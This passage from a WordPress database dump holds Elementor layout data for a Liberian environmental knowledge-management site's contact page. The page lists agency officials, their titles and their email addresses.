href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23121,3343,'_elementor_edit_mode','builder'),(23122,3343,'_elementor_template_type','wp-page'),(23123,3343,'_elementor_version','3.0.16'),(23124,3343,'_wp_page_template','default'),(23125,3343,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a 